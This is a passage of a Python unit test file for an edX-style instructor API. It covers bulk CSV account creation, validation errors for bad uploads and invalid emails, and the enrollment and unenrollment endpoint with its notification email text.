assert manual_enrollments[0].state_transition == UNENROLLED_TO_ENROLLED
# test the log for the email sent to the newly created user.
info_log.assert_called_with('email sent to new created user at %s', 'test_student@example.com')
@patch('lms.djangoapps.instructor.views.api.log.info')
def test_account_creation_and_enrollment_with_csv_with_blank_lines(self, info_log):
"""
Happy path test to create a single new user from a CSV that contains blank lines
"""
csv_content = b"\ntest_student@example.com,test_student_1,tester1,USA\n\n"
uploaded_file = SimpleUploadedFile("temp.csv", csv_content)
response = self.client.post(self.url, {'students_list': uploaded_file})
assert response.status_code == 200
data = json.loads(response.content.decode('utf-8'))
assert len(data['row_errors']) == 0
assert len(data['warnings']) == 0
assert len(data['general_errors']) == 0
manual_enrollments = ManualEnrollmentAudit.objects.all()
assert manual_enrollments.count() == 1
assert manual_enrollments[0].state_transition == UNENROLLED_TO_ENROLLED
# test the log for the email sent to the newly created user.
info_log.assert_called_with('email sent to new created user at %s', 'test_student@example.com')
@patch('lms.djangoapps.instructor.views.api.log.info')
def test_email_and_username_already_exist(self, info_log):
"""
If the email address and username already exist
and the user is enrolled in the course, do nothing (no email is sent out)
"""
csv_content = b"test_student@example.com,test_student_1,tester1,USA\n" \
b"test_student@example.com,test_student_1,tester2,US"
uploaded_file = SimpleUploadedFile("temp.csv", csv_content)
response = self.client.post(self.url, {'students_list': uploaded_file})
assert response.status_code == 200
data = json.loads(response.content.decode('utf-8'))
assert len(data['row_errors']) == 0
assert len(data['warnings']) == 0
assert len(data['general_errors']) == 0
manual_enrollments = ManualEnrollmentAudit.objects.all()
assert manual_enrollments.count() == 1
assert manual_enrollments[0].state_transition == UNENROLLED_TO_ENROLLED
# test the log message for the already-existing user (no new account is created).
info_log.assert_called_with(
"user already exists with username '%s' and email '%s'",
'test_student_1',
'test_student@example.com'
)
def test_file_upload_type_not_csv(self):
"""
Try uploading a file with a non-CSV extension and verify that it is rejected
"""
uploaded_file = SimpleUploadedFile("temp.jpg", io.BytesIO(b"some initial binary data: \x00\x01").read())
response = self.client.post(self.url, {'students_list': uploaded_file})
assert response.status_code == 200
data = json.loads(response.content.decode('utf-8'))
assert len(data['general_errors']) != 0
assert data['general_errors'][0]['response'] ==\
'Make sure that the file you upload is in CSV format with no extraneous characters or rows.'
manual_enrollments = ManualEnrollmentAudit.objects.all()
assert manual_enrollments.count() == 0
def test_bad_file_upload_type(self):
"""
Try uploading a file with a .csv extension but unreadable binary content and verify that it is rejected
"""
uploaded_file = SimpleUploadedFile("temp.csv", io.BytesIO(b"some initial binary data: \x00\x01").read())
response = self.client.post(self.url, {'students_list': uploaded_file})
assert response.status_code == 200
data = json.loads(response.content.decode('utf-8'))
assert len(data['general_errors']) != 0
assert data['general_errors'][0]['response'] == 'Could not read uploaded file.'
manual_enrollments = ManualEnrollmentAudit.objects.all()
assert manual_enrollments.count() == 0
def test_insufficient_data(self):
"""
Try uploading a CSV file which does not have the exact four columns of data
"""
csv_content = b"test_student@example.com,test_student_1\n"
uploaded_file = SimpleUploadedFile("temp.csv", csv_content)
response = self.client.post(self.url, {'students_list': uploaded_file})
assert response.status_code == 200
data = json.loads(response.content.decode('utf-8'))
assert len(data['row_errors']) == 0
assert len(data['warnings']) == 0
assert len(data['general_errors']) == 1
assert data['general_errors'][0]['response'] ==\
'Data in row #1 must have exactly four columns: email, username, full name, and country'  # lint-amnesty, pylint: disable=line-too-long
manual_enrollments = ManualEnrollmentAudit.objects.all()
assert manual_enrollments.count() == 0
def test_invalid_email_in_csv(self):
"""
Test failure case of a poorly formatted email field
"""
csv_content = b"test_student.example.com,test_student_1,tester1,USA"
uploaded_file = SimpleUploadedFile("temp.csv", csv_content)
response = self.client.post(self.url, {'students_list': uploaded_file})
data = json.loads(response.content.decode('utf-8'))
assert response.status_code == 200
assert len(data['row_errors']) != 0
assert len(data['warnings']) == 0
assert len(data['general_errors']) == 0
assert data['row_errors'][0]['response'] == 'Invalid email {0}.'.format('test_student.example.com')
manual_enrollments = ManualEnrollmentAudit.objects.all()
assert manual_enrollments.count() == 0
@patch('lms.djangoapps.instructor.views.api.log.info')
def test_csv_user_exist_and_not_enrolled(self, info_log):
"""
If the email address and username already exist
and the user is not enrolled in the course, enroll them and move on to the next row.
"""
csv_content = b"nonenrolled@test.com,NotEnrolledStudent,tester1,USA"
uploaded_file = SimpleUploadedFile("temp.csv", csv_content)
response = self.client.post(self.url, {'students_list': uploaded_file})
assert response.status_code == 200
info_log.assert_called_with(
'user %s enrolled in the course %s',
'NotEnrolledStudent',
self.course.id
)
manual_enrollments = ManualEnrollmentAudit.objects.all()
assert manual_enrollments.count() == 1
assert manual_enrollments[0].state_transition == UNENROLLED_TO_ENROLLED
def test_user_with_already_existing_email_in_csv(self):
"""
If the email address already exists, but the username is different,
assume it is the correct user and simply enroll that user in the course.
"""
csv_content = b"test_student@example.com,test_student_1,tester1,USA\n" \
b"test_student@example.com,test_student_2,tester2,US"
uploaded_file = SimpleUploadedFile("temp.csv", csv_content)
response = self.client.post(self.url, {'students_list': uploaded_file})
assert response.status_code == 200
data = json.loads(response.content.decode('utf-8'))
warning_message = 'An account with email {email} exists but the provided username {username} ' \
'is different. Enrolling anyway with {email}.'.format(email='test_student@example.com', username='test_student_2') # lint-amnesty, pylint: disable=line-too-long
assert len(data['warnings']) != 0
assert data['warnings'][0]['response'] == warning_message
user = User.objects.get(email='test_student@example.com')
assert CourseEnrollment.is_enrolled(user, self.course.id)
manual_enrollments = ManualEnrollmentAudit.objects.all()
assert manual_enrollments.count() == 1
assert manual_enrollments[0].state_transition == UNENROLLED_TO_ENROLLED
def test_user_with_retired_email_in_csv(self):
"""
If the CSV contains email addresses that correspond to users who
have already been retired, confirm that the attempt returns invalid
email errors.
"""
# This email address is re-used to create a retired account and another account.
conflicting_email = 'test_student@example.com'
# prep a retired user
user = UserFactory.create(username='old_test_student', email=conflicting_email)
user.email = get_retired_email_by_email(user.email)
user.username = get_retired_username_by_username(user.username)
user.is_active = False
user.save()
csv_content = "{email},{username},tester,USA".format(email=conflicting_email, username='new_test_student')
uploaded_file = SimpleUploadedFile("temp.csv", six.b(csv_content))
response = self.client.post(self.url, {'students_list': uploaded_file})
assert response.status_code == 200
data = json.loads(response.content.decode('utf-8'))
assert len(data['row_errors']) != 0
assert data['row_errors'][0]['response'] == f'Invalid email {conflicting_email}.'
assert not User.objects.filter(email=conflicting_email).exists()
def test_user_with_already_existing_username_in_csv(self):
"""
If the username already exists (but not the email),
assume it is a different user and fail to create the new account.
"""
csv_content = b"test_student1@example.com,test_student_1,tester1,USA\n" \
b"test_student2@example.com,test_student_1,tester2,US"
uploaded_file = SimpleUploadedFile("temp.csv", csv_content)
response = self.client.post(self.url, {'students_list': uploaded_file})
assert response.status_code == 200
data = json.loads(response.content.decode('utf-8'))
assert len(data['row_errors']) != 0
assert data['row_errors'][0]['response'] == 'Username {user} already exists.'.format(user='test_student_1')  # lint-amnesty, pylint: disable=line-too-long
def test_csv_file_not_attached(self):
"""
Test when the user does not attach a file
"""
csv_content = b"test_student1@example.com,test_student_1,tester1,USA\n" \
b"test_student2@example.com,test_student_1,tester2,US"
uploaded_file = SimpleUploadedFile("temp.csv", csv_content)
response = self.client.post(self.url, {'file_not_found': uploaded_file})
assert response.status_code == 200
data = json.loads(response.content.decode('utf-8'))
assert len(data['general_errors']) != 0
assert data['general_errors'][0]['response'] == 'File is not attached.'
manual_enrollments = ManualEnrollmentAudit.objects.all()
assert manual_enrollments.count() == 0
def test_raising_exception_in_auto_registration_and_enrollment_case(self):
"""
Test that exceptions raised while creating enrollments are reported as row errors
"""
csv_content = b"test_student1@example.com,test_student_1,tester1,USA\n" \
b"test_student2@example.com,test_student_1,tester2,US"
uploaded_file = SimpleUploadedFile("temp.csv", csv_content)
with patch('lms.djangoapps.instructor.views.api.create_manual_course_enrollment') as mock:
mock.side_effect = NonExistentCourseError()
response = self.client.post(self.url, {'students_list': uploaded_file})
assert response.status_code == 200
data = json.loads(response.content.decode('utf-8'))
assert len(data['row_errors']) != 0
assert data['row_errors'][0]['response'] == 'NonExistentCourseError'
manual_enrollments = ManualEnrollmentAudit.objects.all()
assert manual_enrollments.count() == 0
def test_generate_unique_password(self):
"""
generate_unique_password should generate a unique password string that excludes certain characters.
"""
password = generate_unique_password([], 12)
assert len(password) == 12
for letter in password:
assert letter not in 'aAeEiIoOuU1l'
def test_users_created_and_enrolled_successfully_if_others_fail(self):
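"""
Verify that valid rows are still created and enrolled when other rows fail.
"""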
# prep a retired user
user = UserFactory.create(username='old_test_student_4', email='test_student4@example.com')
user.email = get_retired_email_by_email(user.email)
user.username = get_retired_username_by_username(user.username)
user.is_active = False
user.save()
csv_content = b"test_student1@example.com,test_student_1,tester1,USA\n" \
b"test_student3@example.com,test_student_1,tester3,CA\n" \
b"test_student4@example.com,test_student_4,tester4,USA\n" \
b"test_student2@example.com,test_student_2,tester2,USA"
uploaded_file = SimpleUploadedFile("temp.csv", csv_content)
response = self.client.post(self.url, {'students_list': uploaded_file})
assert response.status_code == 200
data = json.loads(response.content.decode('utf-8'))
assert len(data['row_errors']) != 0
assert data['row_errors'][0]['response'] == 'Username {user} already exists.'.format(user='test_student_1')
assert data['row_errors'][1]['response'] == 'Invalid email {email}.'.format(email='test_student4@example.com')
assert User.objects.filter(username='test_student_1', email='test_student1@example.com').exists()
assert User.objects.filter(username='test_student_2', email='test_student2@example.com').exists()
assert not User.objects.filter(email='test_student3@example.com').exists()
assert not User.objects.filter(email='test_student4@example.com').exists()
manual_enrollments = ManualEnrollmentAudit.objects.all()
assert manual_enrollments.count() == 2
@patch('lms.djangoapps.instructor.views.api.generate_random_string',
Mock(side_effect=['first', 'first', 'second']))
def test_generate_unique_password_no_reuse(self):
"""
generate_unique_password should generate a unique password string that hasn't been generated before.
"""
generated_password = ['first']
password = generate_unique_password(generated_password, 12)
assert password != 'first'
@patch.dict(settings.FEATURES, {'ALLOW_AUTOMATED_SIGNUPS': False})
def test_allow_automated_signups_flag_not_set(self):
csv_content = b"test_student1@example.com,test_student_1,tester1,USA"
uploaded_file = SimpleUploadedFile("temp.csv", csv_content)
response = self.client.post(self.url, {'students_list': uploaded_file})
assert response.status_code == 403
manual_enrollments = ManualEnrollmentAudit.objects.all()
assert manual_enrollments.count() == 0
@patch.dict(settings.FEATURES, {'ALLOW_AUTOMATED_SIGNUPS': True})
def test_audit_enrollment_mode(self):
"""
Test that the enrollment mode for audit-only courses is 'audit'.
"""
# Log in the audit course instructor
self.client.login(username=self.audit_course_instructor.username, password='test')
csv_content = b"test_student_wl@example.com,test_student_wl,Test Student,USA"
uploaded_file = SimpleUploadedFile("temp.csv", csv_content)
response = self.client.post(self.audit_course_url, {'students_list': uploaded_file})
assert response.status_code == 200
data = json.loads(response.content.decode('utf-8'))
assert len(data['row_errors']) == 0
assert len(data['warnings']) == 0
assert len(data['general_errors']) == 0
manual_enrollments = ManualEnrollmentAudit.objects.all()
assert manual_enrollments.count() == 1
assert manual_enrollments[0].state_transition == UNENROLLED_TO_ENROLLED
# Verify that the enrollment mode is 'audit'
for enrollment in manual_enrollments:
assert enrollment.enrollment.mode == CourseMode.AUDIT
@patch.dict(settings.FEATURES, {'ALLOW_AUTOMATED_SIGNUPS': True})
def test_honor_enrollment_mode(self):
"""
Test that enrollment mode for unpaid honor courses is 'honor'.
"""
# Remove white label course price
self.white_label_course_mode.min_price = 0
self.white_label_course_mode.suggested_prices = ''
self.white_label_course_mode.save()
# Log in the white label course instructor
self.client.login(username=self.white_label_course_instructor.username, password='test')
csv_content = b"test_student_wl@example.com,test_student_wl,Test Student,USA"
uploaded_file = SimpleUploadedFile("temp.csv", csv_content)
response = self.client.post(self.white_label_course_url, {'students_list': uploaded_file})
assert response.status_code == 200
data = json.loads(response.content.decode('utf-8'))
assert len(data['row_errors']) == 0
assert len(data['warnings']) == 0
assert len(data['general_errors']) == 0
manual_enrollments = ManualEnrollmentAudit.objects.all()
assert manual_enrollments.count() == 1
assert manual_enrollments[0].state_transition == UNENROLLED_TO_ENROLLED
# Verify that the enrollment mode is 'honor'
for enrollment in manual_enrollments:
assert enrollment.enrollment.mode == CourseMode.HONOR
@ddt.ddt
class TestInstructorAPIEnrollment(SharedModuleStoreTestCase, LoginEnrollmentTestCase):
"""
Test enrollment modification endpoint.
This test does NOT exhaustively test state changes, that is the
job of test_enrollment. This tests the response and action switch.
"""
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.course = CourseFactory.create()
# Email URL values
cls.site_name = configuration_helpers.get_value(
'SITE_NAME',
settings.SITE_NAME
)
cls.about_path = f'/courses/{cls.course.id}/about'
cls.course_path = f'/courses/{cls.course.id}/'
def setUp(self):
super().setUp()
self.request = RequestFactory().request()
self.instructor = InstructorFactory(course_key=self.course.id)
self.client.login(username=self.instructor.username, password='test')
self.enrolled_student = UserFactory(username='EnrolledStudent', first_name='Enrolled', last_name='Student')
CourseEnrollment.enroll(
self.enrolled_student,
self.course.id
)
self.notenrolled_student = UserFactory(username='NotEnrolledStudent', first_name='NotEnrolled',
last_name='Student')
# Create invited, but not registered, user
cea = CourseEnrollmentAllowed(email='robot-allowed@robot.org', course_id=self.course.id)
cea.save()
self.allowed_email = 'robot-allowed@robot.org'
self.notregistered_email = 'robot-not-an-email-yet@robot.org'
assert User.objects.filter(email=self.notregistered_email).count() == 0
# uncomment to enable printing of large diffs
# from failed assertions in the event of a test failure.
# (left commented out because pylint flags C0103 (invalid-name))
# self.maxDiff = None
def test_missing_params(self):
""" Test missing all query parameters. """
url = reverse('students_update_enrollment', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url)
assert response.status_code == 400
def test_bad_action(self):
""" Test with an invalid action. """
action = 'robot-not-an-action'
url = reverse('students_update_enrollment', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {'identifiers': self.enrolled_student.email, 'action': action})
assert response.status_code == 400
def test_invalid_email(self):
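"""
Test that a malformed email identifier is reported as invalid in the response.
"""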
url = reverse('students_update_enrollment', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {'identifiers': 'percivaloctavius@', 'action': 'enroll', 'email_students': False}) # lint-amnesty, pylint: disable=line-too-long
assert response.status_code == 200
# test the response data
expected = {
"action": "enroll",
'auto_enroll': False,
"results": [
{
"identifier": 'percivaloctavius@',
"invalidIdentifier": True,
}
]
}
res_json = json.loads(response.content.decode('utf-8'))
assert res_json == expected
def test_invalid_username(self):
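"""
Test that an unrecognized username identifier is reported as invalid in the response.
"""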
url = reverse('students_update_enrollment', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url,
{'identifiers': 'percivaloctavius', 'action': 'enroll', 'email_students': False})
assert response.status_code == 200
# test the response data
expected = {
"action": "enroll",
'auto_enroll': False,
"results": [
{
"identifier": 'percivaloctavius',
"invalidIdentifier": True,
}
]
}
res_json = json.loads(response.content.decode('utf-8'))
assert res_json == expected
def test_enroll_with_username(self):
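"""
Test enrolling an existing user by username instead of email address.
"""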
url = reverse('students_update_enrollment', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {'identifiers': self.notenrolled_student.username, 'action': 'enroll',
'email_students': False})
assert response.status_code == 200
# test the response data
expected = {
"action": "enroll",
'auto_enroll': False,
"results": [
{
"identifier": self.notenrolled_student.username,
"before": {
"enrollment": False,
"auto_enroll": False,
"user": True,
"allowed": False,
},
"after": {
"enrollment": True,
"auto_enroll": False,
"user": True,
"allowed": False,
}
}
]
}
manual_enrollments = ManualEnrollmentAudit.objects.all()
assert manual_enrollments.count() == 1
assert manual_enrollments[0].state_transition == UNENROLLED_TO_ENROLLED
res_json = json.loads(response.content.decode('utf-8'))
assert res_json == expected
def test_enroll_without_email(self):
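"""
Test that enrolling with email_students=False enrolls the user and sends no email.
"""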
url = reverse('students_update_enrollment', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {'identifiers': self.notenrolled_student.email, 'action': 'enroll',
'email_students': False})
print("type(self.notenrolled_student.email): {}".format(type(self.notenrolled_student.email)))
assert response.status_code == 200
# test that the user is now enrolled
user = User.objects.get(email=self.notenrolled_student.email)
assert CourseEnrollment.is_enrolled(user, self.course.id)
# test the response data
expected = {
"action": "enroll",
"auto_enroll": False,
"results": [
{
"identifier": self.notenrolled_student.email,
"before": {
"enrollment": False,
"auto_enroll": False,
"user": True,
"allowed": False,
},
"after": {
"enrollment": True,
"auto_enroll": False,
"user": True,
"allowed": False,
}
}
]
}
manual_enrollments = ManualEnrollmentAudit.objects.all()
assert manual_enrollments.count() == 1
assert manual_enrollments[0].state_transition == UNENROLLED_TO_ENROLLED
res_json = json.loads(response.content.decode('utf-8'))
assert res_json == expected
# Check the outbox
assert len(mail.outbox) == 0
@ddt.data('http', 'https')
def test_enroll_with_email(self, protocol):
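"""
Test that enrolling with email_students=True sends an enrollment notification email.
"""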
url = reverse('students_update_enrollment', kwargs={'course_id': str(self.course.id)})
params = {'identifiers': self.notenrolled_student.email, 'action': 'enroll', 'email_students': True}
environ = {'wsgi.url_scheme': protocol}
response = self.client.post(url, params, **environ)
print("type(self.notenrolled_student.email): {}".format(type(self.notenrolled_student.email)))
assert response.status_code == 200
# test that the user is now enrolled
user = User.objects.get(email=self.notenrolled_student.email)
assert CourseEnrollment.is_enrolled(user, self.course.id)
# test the response data
expected = {
"action": "enroll",
"auto_enroll": False,
"results": [
{
"identifier": self.notenrolled_student.email,
"before": {
"enrollment": False,
"auto_enroll": False,
"user": True,
"allowed": False,
},
"after": {
"enrollment": True,
"auto_enroll": False,
"user": True,
"allowed": False,
}
}
]
}
res_json = json.loads(response.content.decode('utf-8'))
assert res_json == expected
# Check the outbox
assert len(mail.outbox) == 1
assert mail.outbox[0].subject == f'You have been enrolled in {self.course.display_name}'
text_body = mail.outbox[0].body
html_body = mail.outbox[0].alternatives[0][0]
assert text_body.startswith('Dear NotEnrolled Student\n\n')
for body in [text_body, html_body]:
assert f'You have been enrolled in {self.course.display_name} at edx.org by a member of the course staff.'\
in body
assert 'This course will now appear on your edx.org dashboard.' in body
assert f'{protocol}://{self.site_name}{self.course_path}' in body
assert 'To start accessing course materials, please visit' in text_body
assert 'This email was automatically sent from edx.org to NotEnrolled Student\n\n' in text_body
@ddt.data('http', 'https')
def test_enroll_with_email_not_registered(self, protocol):
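"""
Test that enrolling an unregistered email records an allowed enrollment
and sends a registration invitation.
"""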
url = reverse('students_update_enrollment', kwargs={'course_id': str(self.course.id)})
params = {'identifiers': self.notregistered_email, 'action': 'enroll', 'email_students': True}
environ = {'wsgi.url_scheme': protocol}
response = self.client.post(url, params, **environ)
manual_enrollments = ManualEnrollmentAudit.objects.all()
assert manual_enrollments.count() == 1
assert manual_enrollments[0].state_transition == UNENROLLED_TO_ALLOWEDTOENROLL
assert response.status_code == 200
# Check the outbox
assert len(mail.outbox) == 1
assert mail.outbox[0].subject == f'You have been invited to register for {self.course.display_name}'
text_body = mail.outbox[0].body
html_body = mail.outbox[0].alternatives[0][0]
register_url = f'{protocol}://{self.site_name}/register'
assert text_body.startswith('Dear student,')
assert 'To finish your registration, please visit {register_url}'.format(
register_url=register_url,
) in text_body
assert 'Please finish your registration and fill out' in html_body
assert register_url in html_body
for body in [text_body, html_body]:
assert 'You have been invited to join {course} at edx.org by a member of the course staff.'.format(
course=self.course.display_name
) in body
assert ('fill out the registration form making sure to use '
'robot-not-an-email-yet@robot.org in the Email field') in body
assert 'Once you have registered and activated your account,' in body
assert '{proto}://{site}{about_path}'.format(
proto=protocol,
site=self.site_name,
about_path=self.about_path
) in body
assert 'This email was automatically sent from edx.org to robot-not-an-email-yet@robot.org' in body
@ddt.data('http', 'https')
@patch.dict(settings.FEATURES, {'ENABLE_MKTG_SITE': True})
def test_enroll_email_not_registered_mktgsite(self, protocol):
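"""
Test the registration invitation email when the marketing site feature is enabled.
"""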
url = reverse('students_update_enrollment', kwargs={'course_id': str(self.course.id)})
params = {'identifiers': self.notregistered_email, 'action': 'enroll', 'email_students': True}
environ = {'wsgi.url_scheme': protocol}
response = self.client.post(url, params, **environ)
manual_enrollments = ManualEnrollmentAudit.objects.all()
assert manual_enrollments.count() == 1
assert manual_enrollments[0].state_transition == UNENROLLED_TO_ALLOWEDTOENROLL
assert response.status_code == 200
text_body = mail.outbox[0].body
html_body = mail.outbox[0].alternatives[0][0]
assert text_body.startswith('Dear student,')
assert 'To finish your registration, please visit' in text_body
assert 'Please finish your registration and fill' in html_body
for body in [text_body, html_body]:
assert 'You have been invited to join {display_name} at edx.org by a member of the course staff.'.format(
display_name=self.course.display_name
) in body
assert '{proto}://{site}/register'.format(
proto=protocol,
site=self.site_name
) in body
assert ('fill out the registration form making sure to use '
'robot-not-an-email-yet@robot.org in the Email field') in body
assert 'You can then enroll in {display_name}.'.format(
display_name=self.course.display_name
) in body
assert 'This email was automatically sent from edx.org to robot-not-an-email-yet@robot.org' in body
@ddt.data('http', 'https')
def test_enroll_with_email_not_registered_autoenroll(self, protocol):
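"""
Test auto_enroll with an unregistered email: the address is allowed to enroll
and receives a registration invitation.
"""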
url = reverse('students_update_enrollment', kwargs={'course_id': str(self.course.id)})
params = {'identifiers': self.notregistered_email, 'action': 'enroll', 'email_students': True,
'auto_enroll': True}
environ = {'wsgi.url_scheme': protocol}
response = self.client.post(url, params, **environ)
print("type(self.notregistered_email): {}".format(type(self.notregistered_email)))
assert response.status_code == 200
# Check the outbox
assert len(mail.outbox) == 1
assert mail.outbox[0].subject == f'You have been invited to register for {self.course.display_name}'
manual_enrollments = ManualEnrollmentAudit.objects.all()
assert manual_enrollments.count() == 1
assert manual_enrollments[0].state_transition == UNENROLLED_TO_ALLOWEDTOENROLL
text_body = mail.outbox[0].body
html_body = mail.outbox[0].alternatives[0][0]
register_url = '{proto}://{site}/register'.format(
proto=protocol,
site=self.site_name,
)
assert text_body.startswith('Dear student,')
assert 'To finish your registration, please visit {register_url}'.format(
register_url=register_url,
) in text_body
assert 'Please finish your registration and fill out the registration' in html_body
assert 'Finish Your Registration' in html_body
assert register_url in html_body
for body in [text_body, html_body]:
assert 'You have been invited to join {display_name} at edx.org by a member of the course staff.'.format(
display_name=self.course.display_name
) in body
assert (' and fill '
'out the registration form making sure to use robot-not-an-email-yet@robot.org '
'in the Email field') in body
assert ('Once you have registered and activated your account, '
'you will see {display_name} listed on your dashboard.').format(
display_name=self.course.display_name
) in body
assert 'This email was automatically sent from edx.org to robot-not-an-email-yet@robot.org' in body
def test_unenroll_without_email(self):
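"""
Test that unenrolling with email_students=False unenrolls the user and sends no email.
"""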
url = reverse('students_update_enrollment', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {'identifiers': self.enrolled_student.email, 'action': 'unenroll',
'email_students': False})
print("type(self.enrolled_student.email): {}".format(type(self.enrolled_student.email)))
assert response.status_code == 200
# test that the user is now unenrolled
user = User.objects.get(email=self.enrolled_student.email)
assert not CourseEnrollment.is_enrolled(user, self.course.id)
# test the response data
expected = {
"action": "unenroll",
"auto_enroll": False,
"results": [
{
"identifier": self.enrolled_student.email,
"before": {
"enrollment": True,
"auto_enroll": False,
"user": True,
"allowed": False,
},
"after": {
"enrollment": False,
"auto_enroll": False,
"user": True,
"allowed": False,
}
}
]
}
manual_enrollments = ManualEnrollmentAudit.objects.all()
assert manual_enrollments.count() == 1
assert manual_enrollments[0].state_transition == ENROLLED_TO_UNENROLLED
res_json = json.loads(response.content.decode('utf-8'))
assert res_json == expected
# Check the outbox
assert len(mail.outbox) == 0
def test_unenroll_with_email(self):
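"""
Test that unenrolling with email_students=True sends an unenrollment notification email.
"""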
url = reverse('students_update_enrollment', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {'identifiers': self.enrolled_student.email, 'action': 'unenroll',
'email_students': True})
print("type(self.enrolled_student.email): {}".format(type(self.enrolled_student.email)))
assert response.status_code == 200
# test that the user is now unenrolled
user = User.objects.get(email=self.enrolled_student.email)
assert not CourseEnrollment.is_enrolled(user, self.course.id)
# test the response data
expected = {
"action": "unenroll",
"auto_enroll": False,
"results": [
{
"identifier": self.enrolled_student.email,
"before": {
"enrollment": True,
"auto_enroll": False,
"user": True,
"allowed": False,
},
"after": {
"enrollment": False,
"auto_enroll": False,
"user": True,
"allowed": False,
}
}
]
}
manual_enrollments = ManualEnrollmentAudit.objects.all()
assert manual_enrollments.count() == 1
assert manual_enrollments[0].state_transition == ENROLLED_TO_UNENROLLED
res_json = json.loads(response.content.decode('utf-8'))
assert res_json == expected
# Check the outbox
assert len(mail.outbox) == 1
assert mail.outbox[0].subject == f'You have been unenrolled from {self.course.display_name}'
text_body = mail.outbox[0].body
html_body = mail.outbox[0].alternatives[0][0]
assert text_body.startswith('Dear Enrolled Student')
for body in [text_body, html_body]:
assert 'You have been unenrolled from {display_name} at edx.org by a member of the course staff.'.format(
display_name=self.course.display_name,
) in body
assert 'This course will no longer appear on your edx.org dashboard.' in body
assert 'Your other courses have not been affected.' in body
assert 'This email was automatically sent from edx.org to Enrolled Student' in body
def test_unenroll_with_email_allowed_student(self):
url = reverse('students_update_enrollment', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url,
{'identifiers': self.allowed_email, 'action': 'unenroll', 'email_students': True})
print(u"type(self.allowed_email): {}".format(type(self.allowed_email)))
assert response.status_code == 200
# test the response data
expected = {
"action": "unenroll",
"auto_enroll": False,
"results": [
{
"identifier": self.allowed_email,
"before": {
"enrollment": False,
"auto_enroll": False,
"user": False,
"allowed": True,
},
"after": {
"enrollment": False,
"auto_enroll": False,
"user": False,
"allowed": False,
}
}
]
}
manual_enrollments = ManualEnrollmentAudit.objects.all()
assert manual_enrollments.count() == 1
assert manual_enrollments[0].state_transition == ALLOWEDTOENROLL_TO_UNENROLLED
res_json = json.loads(response.content.decode('utf-8'))
assert res_json == expected
# Check the outbox
assert len(mail.outbox) == 1
assert mail.outbox[0].subject == f'You have been unenrolled from {self.course.display_name}'
text_body = mail.outbox[0].body
html_body = mail.outbox[0].alternatives[0][0]
assert text_body.startswith('Dear Student,')
for body in [text_body, html_body]:
assert 'You have been unenrolled from the course {display_name} by a member of the course staff.'.format(
display_name=self.course.display_name,
) in body
assert 'Please disregard the invitation previously sent.' in body
assert 'This email was automatically sent from edx.org to robot-allowed@robot.org' in body
@ddt.data('http', 'https')
@patch('lms.djangoapps.instructor.enrollment.uses_shib')
def test_enroll_with_email_not_registered_with_shib(self, protocol, mock_uses_shib):
mock_uses_shib.return_value = True
url = reverse('students_update_enrollment', kwargs={'course_id': str(self.course.id)})
params = {'identifiers': self.notregistered_email, 'action': 'enroll', 'email_students': True}
environ = {'wsgi.url_scheme': protocol}
response = self.client.post(url, params, **environ)
assert response.status_code == 200
# Check the outbox
assert len(mail.outbox) == 1
assert mail.outbox[0].subject == f'You have been invited to register for {self.course.display_name}'
text_body = mail.outbox[0].body
html_body = mail.outbox[0].alternatives[0][0]
course_url = '{proto}://{site}{about_path}'.format(
proto=protocol,
site=self.site_name,
about_path=self.about_path,
)
assert text_body.startswith('Dear student,')
assert 'To access this course visit {course_url} and register for this course.'.format(
course_url=course_url,
) in text_body
assert 'To access this course visit it and register:' in html_body
assert course_url in html_body
for body in [text_body, html_body]:
assert 'You have been invited to join {display_name} at edx.org by a member of the course staff.'.format(
display_name=self.course.display_name,
) in body
assert 'This email was automatically sent from edx.org to robot-not-an-email-yet@robot.org' in body
@patch('lms.djangoapps.instructor.enrollment.uses_shib')
@patch.dict(settings.FEATURES, {'ENABLE_MKTG_SITE': True})
def test_enroll_email_not_registered_shib_mktgsite(self, mock_uses_shib):
# Try with marketing site enabled and shib on
mock_uses_shib.return_value = True
url = reverse('students_update_enrollment', kwargs={'course_id': str(self.course.id)})
# Try with marketing site enabled
with patch.dict('django.conf.settings.FEATURES', {'ENABLE_MKTG_SITE': True}):
response = self.client.post(url, {'identifiers': self.notregistered_email, 'action': 'enroll',
'email_students': True})
assert response.status_code == 200
text_body = mail.outbox[0].body
html_body = mail.outbox[0].alternatives[0][0]
assert text_body.startswith('Dear student,')
for body in [text_body, html_body]:
assert 'You have been invited to join {display_name} at edx.org by a member of the course staff.'.format(
display_name=self.course.display_name,
) in body
assert 'This email was automatically sent from edx.org to robot-not-an-email-yet@robot.org' in body
@ddt.data('http', 'https')
@patch('lms.djangoapps.instructor.enrollment.uses_shib')
def test_enroll_with_email_not_registered_with_shib_autoenroll(self, protocol, mock_uses_shib):
mock_uses_shib.return_value = True
url = reverse('students_update_enrollment', kwargs={'course_id': str(self.course.id)})
params = {'identifiers': self.notregistered_email, 'action': 'enroll', 'email_students': True,
'auto_enroll': True}
environ = {'wsgi.url_scheme': protocol}
response = self.client.post(url, params, **environ)
print("type(self.notregistered_email): {}".format(type(self.notregistered_email)))
assert response.status_code == 200
# Check the outbox
assert len(mail.outbox) == 1
assert mail.outbox[0].subject == f'You have been invited to register for {self.course.display_name}'
text_body = mail.outbox[0].body
html_body = mail.outbox[0].alternatives[0][0]
course_url = '{proto}://{site}{course_path}'.format(
proto=protocol, site=self.site_name, course_path=self.course_path,
)
assert text_body.startswith('Dear student,')
assert course_url in html_body
assert f'To access this course visit {course_url} and login.' in text_body
assert 'To access this course click on the button below and login:' in html_body
for body in [text_body, html_body]:
assert 'You have been invited to join {display_name} at edx.org by a member of the course staff.'.format(
display_name=self.course.display_name,
) in body
assert 'This email was automatically sent from edx.org to robot-not-an-email-yet@robot.org' in body
def test_enroll_already_enrolled_student(self):
"""
Ensure that already enrolled "verified" students cannot be downgraded
to "honor"
"""
course_enrollment = CourseEnrollment.objects.get(
user=self.enrolled_student, course_id=self.course.id
)
# make this enrollment "verified"
course_enrollment.mode = 'verified'
course_enrollment.save()
assert course_enrollment.mode == 'verified'
# now re-enroll the student through the instructor dash
self._change_student_enrollment(self.enrolled_student, self.course, 'enroll')
# affirm that the student is still in "verified" mode
course_enrollment = CourseEnrollment.objects.get(
